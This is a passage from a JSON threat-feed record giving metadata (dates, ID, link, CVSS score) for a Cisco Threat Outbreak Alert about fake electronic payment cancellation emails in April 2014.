important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "modified": "2014-04-10T13:53:43", "published": "2011-06-29T14:00:33", "id": "CISCO-THREAT-23517", "href": "http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23517", "type": "ciscothreats", "title": "Threat Outbreak Alert: Fake Electronic Payment Cancellation Email Messages on April 8, 2014", "cvss": {"score": 0.0, "vector": "NONE"}}]}